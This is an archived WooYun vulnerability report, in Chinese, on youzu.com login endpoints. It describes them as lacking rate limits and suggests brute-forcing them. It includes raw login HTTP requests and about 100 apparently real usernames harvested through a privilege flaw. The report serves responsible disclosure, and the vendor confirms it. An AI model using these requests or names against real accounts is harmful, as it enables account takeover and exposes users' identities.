乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-26: 细节已通知厂商并且等待厂商处理中 2014-12-29: 厂商已经确认,细节仅向厂商公开 2015-01-08: 细节向核心白帽子及相关领域专家公开 2015-01-18: 细节向普通白帽子公开 2015-01-28: 细节向实习白帽子公开 2015-02-09: 细节向公众公开
先用一平行权限漏洞采集用户名先100个为例
zzsxqb1zuolin1999zqdyyzonghengdazoe289zl3231572zhyp44058zhs117476741zhoumiloveqzhou20112011zhongwewu8zhf183zhaoguchuanzhaobo1033yyy2811098yyf45671yxy20021201yuy810615yulin688yujingaddyszyiykf8866yhsjkdyfx780916ye1069ydzsdahaoydx906yansen000xxw654xx13171846966xuyanbo159xushen163xujinhua06xujianzhong136xuelei715506xuanlv1111xtz77xsotq94157xmjjyr12345xinxingyeyaxinhuyanxican520xiaolu11wznm790319wym0308wyggamewupeng1129wssddx1234wogannimayx112winscom2011windy2ccwhy791120wddwwddwwddw,,,,,
下面两处接口都没有限制登陆次数
GET /site/ulogin?username=usera111&password=pass11&t=0.7611347562824168 HTTP/1.1Host: bbs.youzu.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://bbs.youzu.com/Site/Cookie: __utma=166915638.999324100.1419312277.1419400811.1419479000.3; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279,1419478999; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419479536; __utmb=166915638.3.9.1419479555766; __utmc=166915638Connection: keep-alivePOST /login.php HTTP/1.1Host: passport.youzu.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0Accept: */*Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://passport.youzu.com/login.php?rurl=http%3A%2F%2Fpassport.youzu.com%2FContent-Length: 94Cookie: Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419476489; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419480093;__utma=166915638.2078507509.1419476491.1419476491.1419480093.2; __utmc=166915638; __utmz=166915638.1419476491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=166915638.1.10.1419480093; __utmt=1Connection: keep-alivePragma: no-cacheCache-Control: no-cacheLoginForm%5Busername%5D=aaxxx&LoginForm%5Bpassword%5D=11111&LoginForm%5BrememberMe%5D=0
爆破一下
命中率很高的哦
危害等级:中
漏洞Rank:5
确认时间:2014-12-29 16:39
我们会即时进行修改调整的,谢谢
暂无